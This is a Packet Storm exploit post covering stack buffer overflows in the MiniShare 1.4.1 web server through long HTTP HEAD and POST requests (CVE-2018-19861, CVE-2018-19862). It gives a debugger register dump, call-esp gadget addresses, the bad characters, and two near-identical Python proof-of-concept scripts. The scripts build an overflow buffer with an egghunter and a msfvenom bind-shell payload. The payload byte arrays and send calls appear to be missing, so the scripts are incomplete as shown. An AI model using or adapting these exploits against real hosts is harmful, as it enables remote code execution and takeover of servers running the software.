Lucene search

packetstormRafael PedreroPACKETSTORM:150689
HistoryDec 07, 2018 - 12:00 a.m.

MiniShare 1.4.1 HEAD / POST Buffer Overflow

Rafael Pedrero





`Hi!!! playing in 2006.... I have adapted the exploit to python  
Not only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST  
methods are also vulnerable. The difference is minimal, both are exploited  
in the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length  
EAX 00000000  
ECX 77C3EF3B msvcrt.77C3EF3B  
EDX 00F14E38  
EBX 43346843  
ESP 01563908 ASCII  
EBP 0156BB90  
ESI 00000001  
EDI 01565B68  
EIP 68433568  
C 0 ES 0023 32bit 0(FFFFFFFF)  
P 1 CS 001B 32bit 0(FFFFFFFF)  
A 1 SS 0023 32bit 0(FFFFFFFF)  
Z 0 DS 0023 32bit 0(FFFFFFFF)  
S 0 FS 003B 32bit 7FFDD000(FFF)  
T 0 GS 0000 NULL  
D 0  
O 0 LastErr ERROR_SUCCESS (00000000)  
EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)  
ST0 empty  
ST1 empty  
ST2 empty  
ST3 empty  
ST4 empty  
ST5 empty  
ST6 empty  
ST7 empty  
3 2 1 0 E S P U O Z D I  
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)  
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1  
Only 210 bytes to shellcode  
Badchars '00','0d'  
>findjmp kernel32.dll esp - XP SP 3 English  
Scanning kernel32.dll for code useable with the esp register  
0x7C809F83 call esp  
0x7C8369E0 call esp  
0x7C83C2C5 push esp - ret  
0x7C87641B call esp  
# Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method.  
# Date: 05-12-2018  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage:  
# Software Link:  
# Version: Minishare v1.4.1  
# Tested on: Windows  
# CVE : CVE-2018-19861  
# Category: exploit  
1. Description  
Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to  
execute arbitrary code via a long HTTP HEAD request.  
2. Proof of Concept  
#!/usr/bin/env python  
import socket  
import struct  
import os  
# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to  
execute arbitrary code via a long HTTP HEAD request - by Rafa  
# CVE: CVE-2018-19861  
# Via Egghunter because shellcode in ESP only 210 bytes long.  
# Project Home Page (MiniShare) -  
connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
host = ""  
port = 80  
# 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34  
egghunter =  
#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f  
python -a x86 --platform windows -b "\x00\x0d" -f c  
#Found 10 compatible encoders  
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai  
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)  
#x86/shikata_ga_nai chosen with final size 355  
#Payload size: 355 bytes  
#Final size of c file: 1516 bytes  
#unsigned char buf[] =  
# findjmp kernel32.dll esp - WinXP SP3 English  
#0x7C809F83 call esp  
nops = "\x90" * 16  
junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 -  
1786 - 4 - 16 - len(egghunter))  
print "Sending exploit..."  
buffer = (  
"HEAD " + junk + " HTTP/1.1\r\n"  
"Host: " + shellcode + "\r\n\r\n")  
print "\nExploit Sended ", len(buffer)  
print "Connection error"  
3. Solution:  
This product is deprecated  
# Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method.  
# Date: 05-12-2018  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage:  
# Software Link:  
# Version: Minishare v1.4.1  
# Tested on: Windows  
# CVE : CVE-2018-19862  
# Category: exploit  
1. Description  
Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to  
execute arbitrary code via a long HTTP POST request.  
2. Proof of Concept  
#!/usr/bin/env python  
import socket  
import struct  
import os  
# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to  
execute arbitrary code via a long HTTP POST request - by Rafa  
# CVE: CVE-2018-19862  
# Via Egghunter because shellcode in ESP only 210 bytes long.  
# Project Home Page (MiniShare) -  
connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
host = ""  
port = 80  
# 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34  
egghunter =  
#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f  
python -a x86 --platform windows -b "\x00\x0d" -f c  
#Found 10 compatible encoders  
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai  
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)  
#x86/shikata_ga_nai chosen with final size 355  
#Payload size: 355 bytes  
#Final size of c file: 1516 bytes  
#unsigned char buf[] =  
# findjmp kernel32.dll esp - WinXP SP3 English  
#0x7C809F83 call esp  
nops = "\x90" * 16  
junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 -  
1786 - 4 - 16 - len(egghunter))  
print "Sending exploit..."  
buffer = (  
"POST " + junk + " HTTP/1.1\r\n"  
"Host: " + shellcode + "\r\n\r\n")  
print "\nExploit Sended ", len(buffer)  
print "Connection error"  
3. Solution:  
This product is deprecated  